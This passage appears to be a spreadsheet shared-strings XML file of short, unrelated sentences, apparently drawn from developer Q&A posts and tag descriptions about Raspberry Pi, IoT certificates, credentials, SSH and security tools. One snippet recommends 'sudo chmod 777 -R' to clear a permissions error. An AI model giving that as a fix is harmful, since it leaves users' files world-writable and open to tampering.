    <t>I grounded the /WC pin so it's not write protected.</t>
  </si>
  <si>
    <t>But I read that you should not use local.cert for a production server.</t>
  </si>
  <si>
    <t>Twitter just turned off their old API, though, so as long as you're willing to get an API key, you should be fine (https://dev.twitter.com).</t>
  </si>
  <si>
    <t>Now this will not protect you from IP address spoofing, and many other things I probably haven't thought of.</t>
  </si>
  <si>
    <t>fix the setup in such way that flashing firmware is super easy.</t>
  </si>
  <si>
    <t>There are slight differences in the nodes and also credentials don't import.</t>
  </si>
  <si>
    <t>Then launch IDLE or spyder python IDE and try running this simple program:
You should see a 3d canvas with a box appear in your webb browser.</t>
  </si>
  <si>
    <t>So simple call  without any credentials will make it connect to that last AP.</t>
  </si>
  <si>
    <t>If someone has an idea how I can use the credentials of an active directory user I'll be very thankfull!</t>
  </si>
  <si>
    <t>It will be easier to renew certs automatically.</t>
  </si>
  <si>
    <t>Detailed guide to adding SimpleAuthentication to an ASP.NET MVC or NancyFx web application.</t>
  </si>
  <si>
    <t>This improves interoperability, robustness, and makes writing middleware much more enjoyable.</t>
  </si>
  <si>
    <t>It replaces the previous WMDRM for protecting videos.</t>
  </si>
  <si>
    <t>See this introduction to permission management on Linux.</t>
  </si>
  <si>
    <t>if you then get a permissions error in the log file, run the following
sudo chmod 777 -R /filepath_to_your_script</t>
  </si>
  <si>
    <t>According to the documentation the authentication with the aws iot platform is done with TLS.</t>
  </si>
  <si>
    <t>I connect to ApacheDS LDAP server and
  get super admin user successfully.</t>
  </si>
  <si>
    <t>I tweaked a few files here and there to modify permissions, but thus far nothing.</t>
  </si>
  <si>
    <t>But to find out, I wanted to do some profiling.</t>
  </si>
  <si>
    <t>However, when it asks for a login and I input "pi", I get an error that says "Login Incorrect" and am asked for a login again.</t>
  </si>
  <si>
    <t>Though It doesn't show an error It is not allowing to log in again with the new password when I try to login after logging out.</t>
  </si>
  <si>
    <t>This project uses ESP8266_RTOS_SDK and WolfCrypt 3.9.8 for the crypto.</t>
  </si>
  <si>
    <t>saves the SSID and password to flash.</t>
  </si>
  <si>
    <t>You need to save this certificate in as an array.</t>
  </si>
  <si>
    <t>Biomini-sdk: Is the SDK of the Supremas biometric device: The BioMini.</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/azure/app-service/overview-compare
You are exactly correct on the DPS code requires a local cert store.</t>
  </si>
  <si>
    <t>Detection depends on SIGILL handling just make the unsupported instructions being skipped.</t>
  </si>
  <si>
    <t>I've searched around a bunch and I'm having trouble finding a clear example of what I should do to verify the connecting device.</t>
  </si>
  <si>
    <t>That said, most 4.0 BLE peripherals would probably pass certification for Bluetooth 5.1 without any hardware or firmware change.</t>
  </si>
  <si>
    <t>I dont know if I did the right thing but I used 
To convert my certificate.pem to certificate.crt and for the privatekey.pem I just changed the extension (from .pem to .key)</t>
  </si>
  <si>
    <t>I want to connect to a BLE Device automatically from the pi without any pairing confirmation or user interaction.</t>
  </si>
  <si>
    <t>If you want to have any kind of communication over the wireless network (or ethernet) you must have an IP assigned to every Xbee.</t>
  </si>
  <si>
    <t>I used one time and the connection was made by th UserID that the user get when log in on the app.</t>
  </si>
  <si>
    <t>The KeyChain class provides access to private keys and their corresponding certificate chains in credential storage.</t>
  </si>
  <si>
    <t>You can also post your Adobe Sign specific queries on the Developer Forum.</t>
  </si>
  <si>
    <t>The actual obtainment and verification of user credentials is left to other components.</t>
  </si>
  <si>
    <t>I had a long time decoding IR codes with optimum's Ken Shirriff Arduino Library.</t>
  </si>
  <si>
    <t>Here is the portion of the code that I am using for the login:
I then have another piece of code that recieves the information coming back from the host which I know works.</t>
  </si>
  <si>
    <t>I have also been developing as the root user the entire time, so I shouldn't see any issues.</t>
  </si>
  <si>
    <t>I'm trying to read on  but I'm receiving corrupted data, I already tried cat, dd and libusb bindings for Node.js, all have the same result.</t>
  </si>
  <si>
    <t>Raspberry Pi is correctly connected to internet through ethernet (I tested the connection using the midori web browser on raspbian).</t>
  </si>
  <si>
    <t>I have verified that I am connected to the network, and that the network has no proxy issues with Twitter.</t>
  </si>
  <si>
    <t>I thought that I gave apache root access when I edited sudoers.</t>
  </si>
  <si>
    <t>AT+TYPE0 (0:Not need PIN Code  ) connects via BLE Scanner app.</t>
  </si>
  <si>
    <t>So I already have a SSH connection working but I'm looking for a command that can write a number like '1' into the console on the raspberry pi.</t>
  </si>
  <si>
    <t>Is there a way to identify the messages received is from the registered gateway or device in the organization.</t>
  </si>
  <si>
    <t>The difficult part is to convert ssh packet to ssh commands on Raspberry side.</t>
  </si>
  <si>
    <t>After some digging around i've seen some things about checking if my ssh keys are proper, which is where i'm really confused.</t>
  </si>
  <si>
    <t>I am using the latest Intel Platform Flash tool 5.8.3 v for windows.</t>
  </si>
  <si>
    <t>3) Tried registering the device by putting in the serial number on the cumulocity site.</t>
  </si>
  <si>
    <t>I am trying to connect to a specific wifi network by keying in the ssid and password manually and then submitting using a button.</t>
  </si>
  <si>
    <t>properties.reported is empty except for the metadata timestamp from the day the device was registered.</t>
  </si>
  <si>
    <t>How do I trigger device certificate and private key generation properly just by using my Just-in-Time certificate?</t>
  </si>
  <si>
    <t>I have an other question:
What will happen if I keep on appending the file with the wifi credentials, instead of overwriting it?</t>
  </si>
  <si>
    <t>Passing unencrypted credentials and tokens around doesn't strike me as being terribly secure.</t>
  </si>
  <si>
    <t>I am now trying to write a Python script to access the device, but am prompted for a password when I attempt to run
I've tried the os module as well, to no avail.</t>
  </si>
  <si>
    <t>Is there fully written python library for waveshare capacitive fingerprint reader?</t>
  </si>
  <si>
    <t>I expected to see the video playback through the edge detection applied, but it did not.</t>
  </si>
  <si>
    <t>I understand the security concerns, but only the single user has access to the device this way and must be in close proximity.</t>
  </si>
  <si>
    <t>I would like to be able to choose a default device and not have to confirm for every picture sent.</t>
  </si>
  <si>
    <t>The second is that some recent versions of XBMC (especially for the raspberry pi) do not support this particular network control channel -  that is the real cause of the failure, only being concealed by the former.</t>
  </si>
  <si>
    <t>If you've already developed your firmware, switching to 30-pin may introduce problems.</t>
  </si>
  <si>
    <t>The issue is that I was using Arduino IDE 1.0.5 and there is a bug in that which prevents Wi-Fi communication.</t>
  </si>
  <si>
    <t>You might be able to do things using AVR see http://arduino.cc/en/Hacking/Programmer.</t>
  </si>
  <si>
    <t>This anomaly appears to be an artifact of incomplete address decoding in the AM335x chip.</t>
  </si>
  <si>
    <t>As far as i know js cannot load a local file on the client without user interaction because this could be a serious security issue.</t>
  </si>
  <si>
    <t>As with Quickstart, the client ID must also be correct and reflect the registered device being connected.</t>
  </si>
  <si>
    <t>in case someone has tampered with ~/.reboots), but is meant as proof of concept only.</t>
  </si>
  <si>
    <t>You would first wait for a tag:
You can then authenticate to the sector that you want to read.</t>
  </si>
  <si>
    <t>This means that the mongo shell utilities from 2.6 and earlier will fail to authenticate against deployments using this new mechanism.</t>
  </si>
  <si>
    <t>Actually, you might not need any dangerous permission at all  for example, I do nothing on ACTION_FOUND  because ACTION_NANE_CHANGED is fired always here in my scenarios; reported in Issue 62524160.</t>
  </si>
  <si>
    <t>I got a solution:
To give permissions to edit files in the  library directory.</t>
  </si>
  <si>
    <t>I hope you are not using the right certificate files to connect to aws,
http://aws-iot-device-sdk-embedded-c-docs.s3-website-us-east-1.amazonaws.com/aws__iot__error_8h.html</t>
  </si>
  <si>
    <t>For more information, you can reference Store and retrieve settings and File access permissions.</t>
  </si>
  <si>
    <t>The problem is that: if someone's able to fully reconstruct the state of your program, they can also reconstruct what your encryption would have done if the data was different.</t>
  </si>
  <si>
    <t>Connect to adb via the network like this:
At this point you should be able to validate your connection:
$ adb devices
List of devices attached
192.168.1.228:5555    device</t>
  </si>
  <si>
    <t>The result will be a list of ARNs representing the certificates associated with the thing, of the form arn:aws:iot:&lt;region&gt;:&lt;account id&gt;:cert/&lt;cert id&gt;.</t>
  </si>
  <si>
    <t>Actually, python's  is blocking until it get a EOL, so if you do not have lock issue that mean the Arduino is writing in the buffer faster that your python script read it.</t>
  </si>
  <si>
    <t>I've left out the wifi, dht and mqtt modules - they will vary according to your requirements (such as the credentials, or indeed if you are using something other than MQTT).</t>
  </si>
  <si>
    <t>We then downloaded a new client-secret json and changed which account the voice kit was linked to.</t>
  </si>
  <si>
    <t>I would recommend to triple check your policy (and certificates and the links between them and your thing).</t>
  </si>
  <si>
    <t>If you have an application that is registered to listen to IOT events, then that app could be writing to a Db2 database.</t>
  </si>
  <si>
    <t>User based security is only available to client code that's actually using Firebase Authentication to verify the identity of the user.</t>
  </si>
  <si>
    <t>You need to give  command to enable additional caller information.</t>
  </si>
  <si>
    <t>Also, you can verify the number simply on your Arduino code if the received value is valid.</t>
  </si>
  <si>
    <t>Facebook login is a popular sign in method for many websites using Facebook credentials.</t>
  </si>
  <si>
    <t>It usually occurs when a distributed transaction waiting for a lock times out.</t>
  </si>
  <si>
    <t>The interceptors are service factories that are registered with the `$httpProvider` by adding them to the `$httpProvider.interceptors` array.</t>
  </si>
  <si>
    <t>You can use W3C validation services to check HTML documents, CSS stylesheets, Atom/RSS feeds, and more.</t>
  </si>
  <si>
    <t>ACCESSKEY
The ACCESSKEY attribute can be used to specify a shortcut key for the link (activated by pressing 'Alt' and the ACCESSKEY together - like standard Windows applications menu shortcuts).</t>
  </si>
  <si>
    <t>An example of a validation check is the procedure used to verify an ISBN:
Size.</t>
  </si>
  <si>
    <t>In addition, APIs were added in J2SE 5.0 to allow applications to obtain the timestamp information.</t>
  </si>
  <si>
    <t>More information
IBM - Understanding LTPA
IBM - Security Cache, LTPA Token, and Session Time Outs</t>
  </si>
  <si>
    <t>Keeping the state of the control (valid/invalid, dirty/pristine, validation errors).</t>
  </si>
  <si>
    <t>Added a simplified password hashing API.</t>
  </si>
  <si>
    <t>A person's privacy settings combined with what you ask for will determine what you can access.</t>
  </si>
  <si>
    <t>The Data Lake Store allows for petabyte sized files, and unlimited accounts sizes, surfaced through an HDFS API enabling any Hadoop component to access data.</t>
  </si>
  <si>
    <t>Using T for Backup
@jphpsf wrote a blog post explaining how to use t to backup
your Twitter account.</t>
  </si>
  <si>
    <t>git-crypt gracefully degrades, so developers without the secret key can still clone and commit to a repository with encrypted files.</t>
  </si>
  <si>
    <t>To use the Standard Plan you need to provide public accessibility to your Google Maps API implementation.</t>
  </si>
  <si>
    <t>However, it can additionally verify (and leverage) type annotations.</t>
  </si>
  <si>
    <t>You can also use it with Instruments to monitor several characteristics of your app or detect bugs.</t>
  </si>
  <si>
    <t>Rather than have the observer deal with registering with them all, you can consolidate the registration logic to the Event Aggregator.</t>
  </si>
  <si>
    <t>It also provided verifying doubles, composable matchers, a new syntax that allows RSpec to be used with no monkey patching, and many other new features.</t>
  </si>
  <si>
    <t>For example usage, check out Facebook for Websites and the Authentication guide.</t>
  </si>
  <si>
    <t>Multiple listeners can be registered on the same component and all will be fired.</t>
  </si>
  <si>
    <t>http://www.microsoft.com/PlayReady/
The Netflix Silverlight application is a very common example of PlayReady protected video content.</t>
  </si>
  <si>
    <t>I've got a standard command which I use from the CL to to share my key with a remote host (Raspberry Pi usually).</t>
  </si>
  <si>
    <t>Extract of the code : 
readblock function (authentication and read)
The result is 
Authenticate block 0x05 with key B
Authenticated block nb.</t>
  </si>
  <si>
    <t>But for triggering the Package Manager you must have the above permissions (android.permission.INSTALL_PACKAGES &amp; android.permission.DELETE_PACKAGES) thus the device admin privileges.</t>
  </si>
  <si>
    <t>Their main service is based on Google Authenticator one-time passwords.</t>
  </si>
  <si>
    <t>Its primary purpose is to detect weak Unix passwords.</t>
  </si>
  <si>
    <t>More specifically, Blockstack builds an alternate DNS and alternate public-key infrastructure.</t>
  </si>
  <si>
    <t>Entry control means that before the execution enters the loop, the loop's condition is verified.</t>
  </si>
  <si>
    <t>Sometimes an adversary can obtain unencrypted information without directly undoing the encryption.</t>
  </si>
  <si>
    <t>Some methods can be very complicated to achieve a proper jailbreak, and others like the jailbreakme.com exploit can be very easy.</t>
  </si>
  <si>
    <t>I imagine this is because nginx seems to use this user called www-data to do stuff, so maybe its a permissions issue?</t>
  </si>
  <si>
    <t>I'm building a security camera system for my home out of a number of raspberry pi's.</t>
  </si>
  <si>
    <t>This way I can just verify my program using g++ or similar, no windows prompted.</t>
  </si>
  <si>
    <t>This code seems quite logical to me and should handle quadrature encoder reading well, provided the event detection works without a hitch.</t>
  </si>
  <si>
    <t>If you mind about the cookies hacking, you should encrypt that timestamp.</t>
  </si>
  <si>
    <t>One thing though is that if that Blue LED never goes off then either the module has frozen or the firmware was corrupted.</t>
  </si>
  <si>
    <t>So, always confirm the installation manually for every single package you need.</t>
  </si>
  <si>
    <t>There is no Windows or MacOS SSH host support at present... but this may not be the case in another months time.</t>
  </si>
  <si>
    <t>SPNEGO (Simple and Protected GSSAPI Negotiation Mechanism)  is a GSSAPI "pseudo mechanism" that is used to negotiate one of a number of possible real mechanisms.</t>
  </si>
  <si>
    <t>The server facilitates message exchange between devices that detect the same pairing code.</t>
  </si>
  <si>
    <t>Read on to determine if custom policies are right for you and your identity scenario.</t>
  </si>
  <si>
    <t>Are able to authenticate users using their Oauth credentials (id and secret) which unequivocally identify the application.</t>
  </si>
  <si>
    <t>I tried the code from this one:
Android and MJPEG
and then i got a black screen and it crash.. from the comments on that page, i found that i need to get the http certificates or such..</t>
  </si>
  <si>
    <t>I am trying to take input from usb barcode scanner in python (Raspberry pi).</t>
  </si>
  <si>
    <t>The username input seems to have CSS id  and xpath //*[@id="account"].</t>
  </si>
  <si>
    <t>Documentation for ROAuth is available here.</t>
  </si>
  <si>
    <t>Im sure, someone has some working codes and can upload them.</t>
  </si>
  <si>
    <t>I wrote the user to the users file as
what bothers me is that the User-Password and User-Name seem to be sent to the server in an encrypted format, which might be the reason why it does not work, but I have no idea what causes this.</t>
  </si>
  <si>
    <t>I am able to sent At commands and I would like to use it for scanning for iBeacons and get their major and minor.</t>
  </si>
  <si>
    <t>Alternatively, you could use GPIO module's more advanced features, such as edge detection and callbacks.</t>
  </si>
  <si>
    <t>I've seen examples for ESP8266 chip Wifi clients logging onto a WPA2 personal network.</t>
  </si>
  <si>
    <t>I posted about writing the switch in C, but assembly seems to be safer and more reliable.</t>
  </si>
  <si>
    <t>These databases are accessed with individual network credentials, so long as the employee is on the permissions list.</t>
  </si>
  <si>
    <t>I need to know that I will not, hopefully ever, have to SSH back into the server to re-execute the commands, as it is crucial that the programs are running at all times.</t>
  </si>
  <si>
    <t>As I understand, some cryptographic functions are not ported in .net core 2.x for linux.</t>
  </si>
  <si>
    <t>I selected "extended" under "Firmware to boot" in buildroot menuconfig but the resulting image still contains only the default firmware.</t>
  </si>
  <si>
    <t>I try to develop an automation to register new IoT device with public RSA pem certificate but I have a problem which is I don't know the reason.</t>
  </si>
  <si>
    <t>Currently there is a bug in the IOS 8.0 simulator; try running on iOS 7.1 to verify system sounds are working - which will directly implicate the simulator.</t>
  </si>
  <si>
    <t>Many of those chips can be separately programmed with unique serial numbers.</t>
  </si>
  <si>
    <t>Regarding onCharacteristicChanged() not being called, you need to verify that the server is actually receiving the subscription request.</t>
  </si>
  <si>
    <t>The group rekey interval is the period of time in between automatic changes of the group key, which all devices on the network share.</t>
  </si>
  <si>
    <t>You would get the process id immediately after executing this command with which you can monitor or verify it.</t>
  </si>
  <si>
    <t>Either way, my only solutions were:
Get a Raspberry Pi 3 (Wi-fi Integrated, since I was using the Pi 2 and I needed to connected via Ethernet) and ask a friend if he could shared me his private network.</t>
  </si>
  <si>
    <t>The  that gets send to the device should look like this (if you do use the ACR admin credentials and not the recommended service principle):
Can you confirm your deployment.json looks like this?</t>
  </si>
  <si>
    <t>It is used by Microsoft in IE and storing WiFi passwords and private keys for EFS, and also by Chrome for Windows and Safari for Windows, to store website credentials.</t>
  </si>
  <si>
    <t>Kerberos Delegation is a feature that allows an application to reuse the end-user credentials to access resources hosted on a different server</t>
  </si>
  <si>
    <t>ssh-agent remembers the decrypted private key so that the user does not need to type it every time he or she wants to connect or send data to the server.</t>
  </si>
  <si>
    <t>Facebook authentication is popular sign in method for many websites using Facebook credentials.</t>
  </si>
  <si>
    <t>QNetworkRequest is part of the Network Access API and is the class holding the information necessary to send a request over the network.</t>
  </si>
  <si>
    <t>Kerberos Delegation is a feature that allows an application to reuse the end-user credentials to access resources hosted on a different server.</t>
  </si>
  <si>
    <t>A common example is a web server passing the credentials of the client user to a database server behind it.</t>
  </si>
  <si>
    <t>Your
  application stores the public key in its compiled .apk file and uses
  it to verify the licensing status response.</t>
  </si>
  <si>
    <t>Use of Tcl 8.4 or earlier is usually not recommended, as it does not receive security-fix support from the Tcl developers.</t>
  </si>
  <si>
    <t>The Luciad AIXM 5 Viewer is a free tool for users to view, verify and convert AIXM 5 data.</t>
  </si>
  <si>
    <t>As per that link there is no point in disabling the certificate verification when we opt for SSL/TLS secured connection.</t>
  </si>
  <si>
    <t>Fixing your settings
Once failsafe mode is triggered, the router will boot with a network address of 192.168.1.1/24, usually on the eth0 network interface, with only essential services running.</t>
  </si>
  <si>
    <t>In this case, leave the username and password blank and make sure to save it.</t>
  </si>
  <si>
    <t>Following is my code to get user consent.</t>
  </si>
  <si>
    <t>I anyway tried the following:
where  is generated via Azure CLI az iot hub generate-sas-token -n &lt;myhub&gt;.</t>
  </si>
  <si>
    <t>There is another load testing scenario, in which I am not doing registration of devices, but just capturing the connect or disconnect events.</t>
  </si>
  <si>
    <t>Phone call done in hardware, hardware gsm core have closed firmware/drivers and thoose interfaces specialy designed to not allow access.</t>
  </si>
  <si>
    <t>Encrypted/Encryption
Encryption is the conversion of data into a form, called a ciphertext, that cannot be easily understood by unauthorized people.</t>
  </si>
  <si>
    <t>SmallCheck is a testing library that allows to verify properties for all test cases up to some depth.</t>
  </si>
  <si>
    <t>The web.config file contains information that controls module loading, security configuration, session state configuration, and application language and compilation settings.</t>
  </si>
  <si>
    <t>A class that implements this interface can be registered so that the programmer can control what should happen in this case.</t>
  </si>
  <si>
    <t>It is also used by some to find malware.</t>
  </si>
  <si>
    <t>From Wikipedia:
In computer science, a fingerprinting algorithm is a procedure that
  maps an arbitrarily large data item (such as a computer file) to a
  much shorter bit string, its fingerprint, that uniquely identifies the
  original data for all practical purposes just as human fingerprints
  uniquely identify people for practical purposes.</t>
  </si>
  <si>
    <t>Secure Data Management</t>
  </si>
  <si>
    <t>KeY is an open-source formal software verification tool, mainly for deductively proving program correctness of Java source code.</t>
  </si>
  <si>
    <t>A fingerprinting algorithm is a procedure that maps an arbitrarily large data item (such as a computer file) to a much shorter bit string, its fingerprint, that uniquely identifies the original data for all practical purposes just as human fingerprints uniquely identify people for practical purposes.</t>
  </si>
  <si>
    <t>Memory corruption occurs in a computer program when the contents of a memory location are unintentionally modified due to programming errors; this is termed violating memory safety.</t>
  </si>
  <si>
    <t>Named-entity recognition (NER) (also known as entity identification and entity extraction) is a subtask of information extraction that seeks to locate and classify atomic elements in text into predefined categories such as the names of persons, organizations, locations, expressions of times, quantities, monetary values, percentages, etc.</t>
  </si>
  <si>
    <t>Formal verification is the act of proving or disproving the correctness of intended algorithms underlying a system with respect to a certain formal specification or property, using formal methods of mathematics.</t>
  </si>
  <si>
    <t>Other differences between the processes:
Each process has an independent, unique process identification (pid)
Each has different parent process IDs (ppid)
Each process has independent file descriptors which refer to the same files.</t>
  </si>
  <si>
    <t>In general open data is made available by governments or government controlled agencies, often referred to as Open Government Data (OGD), but in reality it can refer to any data made available by any agency, be they a corporate or government entity.</t>
  </si>
  <si>
    <t>It allows for distributed intelligence (device, gateway, cloud apps)
Some design principles are:
IPbased, but interworks with specific IP and non IP technologies in the
M2M Area networks
RESTful resource oriented APIs, resources are representations of devices/
applications
Distributed intelligence (device, gateway, edge, cloud)
Reuse of existing device management frameworks
Reuse of existing data exchange protocols
Reuse of existing security frameworks
Reuse of underlying network capabilities such as location, triggering, etc.</t>
  </si>
  <si>
    <t>Spin is a popular open-source software tool, that can be used for the formal verification of distributed software systems.</t>
  </si>
  <si>
    <t>Spin is a popular open-source software tool that can be used for the formal verification of distributed software systems.</t>
  </si>
  <si>
    <t>HockeyApp is a way to 
Collect beta and production crash reports
Get feedback from users
Distribute beta builds to testers
HockeyApp offers one of the most reliable and complete crash reporting for beta and App Store versions using open source frameworks.</t>
  </si>
  <si>
    <t>Windows ACK provides guidelines for developers for using the kit and the associated certification processes
Description
The Windows App Certification Kit (ACK) is used to validate compliance with certification requirements, and replaces the Windows Software Logo Kit (WSLK) used for validation in the Windows 7 Software Logo program.</t>
  </si>
  <si>
    <t>V-Model (not to be confused with Vue's v-model directive), also kown as Verification and Validation model, is an abstraction model for software design where execution of processes happens in a sequential manner with each development phase associated with a corresponding testing phase.</t>
  </si>
  <si>
    <t>From Wikipedia:
Online banking also known as internet banking, e-banking, or virtual
  banking, is an electronic payment system that enables customers of a
  bank or other financial institution to conduct a range of financial
  transactions through the financial institution's website.</t>
  </si>
  <si>
    <t>The term "white hat" in Internet slang refers to an ethical computer hacker, or a computer security expert, who specializes in penetration testing and in other testing methodologies to ensure the security of an organization's information systems.</t>
  </si>
  <si>
    <t>CrashRpt is an open-source library designed for intercepting exceptions from a C++ program, collecting technical information about the crash and reporting the error reports over the Internet.</t>
  </si>
  <si>
    <t>DO-178B, Software Considerations in Airborne Systems and Equipment Certification is a guideline dealing with the safety of safety-critical software used in certain airborne systems.</t>
  </si>
  <si>
    <t>The "corrupt" tag is appropriate for questions related to damaged data structures or files:
detecting corruption: often related to common error messages or error states
preventing corruption: techniques for analyzing causes and avoiding them
recovering from corruption: tools and techniques for extracting partial data from damaged data structures, or restoring consistency to inconsistent data
Questions will always be in the context of a particular data structure, such as:
file format (zip, gzip, rar, ...)
file system (extfs, ntfs, ...)
data structure (tree, heap, memory, ...)</t>
  </si>
  <si>
    <t>Not all formats have freely available specification documents, partly because some developers view their specification documents as trade secrets, and partly because other developers never author a formal specification document, letting precedent set by other programs define the format.</t>
  </si>
  <si>
    <t>Part 1: The Video4Linux2 API
Part 2: registration and open()
Part 3: Basic ioctl() handling
Part 4: Inputs and Outputs
Part 5a: Colors and formats
Part 5b: Format negotiation
Part 6a: Basic frame I/O
Part 6b: Streaming I/O
Part 7: Controls</t>
  </si>
  <si>
    <t>Kaspersky Anti-Virus is an antivirus program developed by Kaspersky Lab, designed to protect users from malware and is primarily designed for computers running Microsoft Windows and Mac OS X, though a version for Linux is available for business consumers.</t>
  </si>
  <si>
    <t>Corda is an open-source distributed ledger platform designed to record, manage and automate legal agreements between businesses.</t>
  </si>
  <si>
    <t>Data mapping is typically used as a first step for a wide variety of data integration tasks such as:
Data transformation or data mediation between a data source and a destination
Identification of data relationships as part of data lineage analysis
Replication of data between two entities with different key-value assignments
Discovery of hidden sensitive data such as the last four digits social security number hidden in another user id as part of a data masking or de-identification project
Consolidation of multiple databases into a single data base and identifying redundant columns of data for consolidation or elimination.</t>
  </si>
  <si>
    <t>Functional verification is a part of more encompassing design verification, which, besides functional verification, considers non-functional aspects like timing, layout and power.</t>
  </si>
  <si>
    <t>The OpenDaylight Project is a collaborative open source project that aims to accelerate adoption of Software-Defined Networking (SDN) and create a solid foundation for Network Functions Virtualization (NFV) for a more transparent approach that fosters new innovation and reduces risk.</t>
  </si>
  <si>
    <t>Checkmarx CxSuite is a unique source code analysis solution that provides tools for identifying, tracking, and repairing technical and logical flaws in the source code, such as security vulnerabilities, compliance issues, and business logic problems.</t>
  </si>
  <si>
    <t>Some RTOS may use an opt-in approach wher all I/O and memory not specifically mapped to a specific task is out-of bounds, while others may be opt-out where a task can access any memory not specifically protected for access by a specific task.</t>
  </si>
  <si>
    <t>Software security refers to software specifically designed to provide computer security from hackers.</t>
  </si>
  <si>
    <t>--source wikipedia
Handling illegal accesses and invalid page faults:
If the program receiving the error does not handle it, the operating
system performs a default action, typically involving the termination
of the running process that caused the error condition, and notifying
the user that the program has malfunctioned.</t>
  </si>
  <si>
    <t>memory-editing is used in its general concept, varying from questions regarding injections, writing to other processes's memory and such, to game cheating: Quoting Wikipedia:
Cheating via memory editing involves modifying the memory values where the game keeps its status information.</t>
  </si>
  <si>
    <t>Source code analyzer software which provides identifying, tracking and repairing technical and logical flaws.</t>
  </si>
  <si>
    <t>The Open Financial Exchange specification is publicly available for implementation by any financial institution or vendor, and is available for review on this website.</t>
  </si>
  <si>
    <t>Between 1969 and 1972, Sandy Mathes, a systems programmer for PDP-8 software at Digital Equipment Corporation (DEC) in Maynard, MA, used the terms "bug" and "feature" in her reporting of test results to distinguish between undocumented actions of delivered software products that were unacceptable and tolerable, respectively.</t>
  </si>
  <si>
    <t>Open source describes practices in the production and development of software that promote access to the underlying build materials, including the source code.</t>
  </si>
  <si>
    <t>Banking refers to the process of carrying out financial transactions through centralized institutions known as banks.</t>
  </si>
  <si>
    <t>Definitive List of Common Reasons for Segmentation Faults
Wikipedia topic on Segmentation Fault
Wikipedia topic on Memory Protection
If the program crashed due to 
unauthorized memory access
using out-of-bound memory location
using of uninitialized memory
and it has received  and/or a coredump file is getting generated, mark your questions using this tag.</t>
  </si>
  <si>
    <t>For debugging, tools for tracking memory leaks and memory corruption are part of the FastMM manager.</t>
  </si>
  <si>
    <t>Merchants and software vendors must be certified by PCI and report their compliance with the industry standard for consumer security.</t>
  </si>
  <si>
    <t>Parrot Security OS is a Debian-based Linux distribution designed for penetration testing, vulnerability assessment and mitigation, computer forensics and anonymous web browsing.</t>
  </si>
  <si>
    <t>Open Financial Exchange is a unified specification for the electronic exchange of financial data between financial institutions, businesses and consumers via the Internet.</t>
  </si>
  <si>
    <t>Atomikos software safeguards critical transactions and prevents costly data loss or corruption in the event of a system failure or crash by automating the cancellation of failed business transactions.</t>
  </si>
  <si>
    <t>Open Financial Exchange (OFX) is a unified specification for the electronic exchange of financial data between financial institutions, businesses and consumers via the Internet.</t>
  </si>
  <si>
    <t>ClamAV is an open source (GPL) antivirus engine designed for detecting Trojans, viruses, malware and other malicious threats.</t>
  </si>
  <si>
    <t>Also this issue seems very device dependent (100% repro on 2 of my devices, and no one issue on other 3) Other platforms (win32, iOS) also didn't spotted corrupted memory (i'm working on crossplatform game) So android's dalvik memory manager is nice "tool" to detect memory bugs, now we testing everyday build on "memory corruption sensitive" device.</t>
  </si>
  <si>
    <t>Fault tolerance
A system designed to be distributed across many machines must be highly fault tolerant because the likelihood of hardware and network failures increases with the number of machines involved.</t>
  </si>
  <si>
    <t>Definitions of Open Data in Literature
[1] Machine readable data made available by governments or government controlled agencies under open licence conditions that allow for further commercial or non commercial use of the data (Janssen and Darbishire, 2012).</t>
  </si>
  <si>
    <t>Flawfinder is a simple software tool that examines C/C++ source code and reports possible security weaknesses (flaws) sorted by risk level.</t>
  </si>
  <si>
    <t>Source Code Analysis tools are designed to analyze source code and/or compiled version of code in order to help find security flaws.</t>
  </si>
  <si>
    <t>Bluetooth low energy, Bluetooth LE, or BLE, marketed as Bluetooth Smart, is a wireless personal area network technology designed and marketed by the Bluetooth Special Interest Group aimed at novel applications in the healthcare, fitness, security, and home entertainment industries.</t>
  </si>
  <si>
    <t>BTLE is short for Bluetooth low energy, Bluetooth LE, or BLE, marketed as Bluetooth Smart, which is a wireless personal area network technology designed and marketed by the Bluetooth Special Interest Group aimed at novel applications in the healthcare, fitness, security, and home entertainment industries.</t>
  </si>
  <si>
    <t>References
Distributed Authoring Scenarios
Authoring Challenges for Device Independence
Authoring HTML: Handling Right-to-left Scripts
Authoring Systems &amp; Semantic Binding
Internationalization Techniques:
Authoring XML</t>
  </si>
  <si>
    <t>As a paid member of the Apple Developer Program, you'll use this tool to manage apps, agreements, tax and banking information, sales reports and more.</t>
  </si>
  <si>
    <t>No matter which one I pick, I get some version of this error:
login as: pi
pi@192.168.1.5's password: 
Linux raspberrypi 3.18.11-v7+ #781 SMP PREEMPT Tue Apr 21 18:07:59 BST 2015 armv7l
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.</t>
  </si>
  <si>
    <t>Data can protected by a secure document password
Web-based reports support the use of secure channels
Flexibility and Interactivity
Built-in script shell that supports 4 languages: PascalScript, C++ Script, BasicScript and JScript
Interactive forms, drill-down (drop) reports, call another report with detailed information from the preview window with one mouse click
Flexible and open architecture.You can enhance it by creating and connecting your own objects (export filters, functions and database engines) to your reports
Inheritance of report templates
Reports can be independent of your application, so the application does not require recompilation when a user requires changes in a report</t>
  </si>
  <si>
    <t>PII stands for Personally Identifiable Information -- that information which can uniquely identify an individual.</t>
  </si>
  <si>
    <t>FLA files are source files for Adobe Flash applications.They are binary files which typically require Flash authoring software to be edited, and are compiled by the authoring software into publishable SWF files.</t>
  </si>
  <si>
    <t>It seeks to clarify the cause, event and effect of each risk, the risk owners and actionees, any plans to mitigate or enhance the risk and any process to then manage secondary or subsequent risks arising from those actions.</t>
  </si>
  <si>
    <t>In computing, the process identifier (normally referred to as the process ID or just PID) is a number used by most operating system kernels (such as that of UNIX, Mac OS X or Microsoft Windows) to (temporarily) uniquely identify a process.</t>
  </si>
  <si>
    <t>The goal of computer forensics is to examine digital media in a forensically sound manner with the aim of identifying, preserving, recovering, analyzing and presenting facts and opinions about the information.</t>
  </si>
  <si>
    <t>Maintenance Supply Chain Management is the best part of Oracle Applications
Planning and execution of Projects is well handled by Projects Module
As every transaction involves money, it needs proper reporting &amp; security.</t>
  </si>
  <si>
    <t>Since then, millions of Veterans have logged onto the tool to download their personal health information, and many of the countrys largest data holders, including federal agencies such as the Centers for Medicare &amp; Medicaid Services (CMS) and the Department of Defense (DoD) and private health plans such as United HealthCare and Aetna, have embraced Blue Button as a way to make health care data readily available to their beneficiaries.</t>
  </si>
  <si>
    <t>By doing so, the function or data structure will be able to handle any type without knowing anything about it, while consumers will still be able to track which type is handled, thereby maintaining full type-safety.</t>
  </si>
  <si>
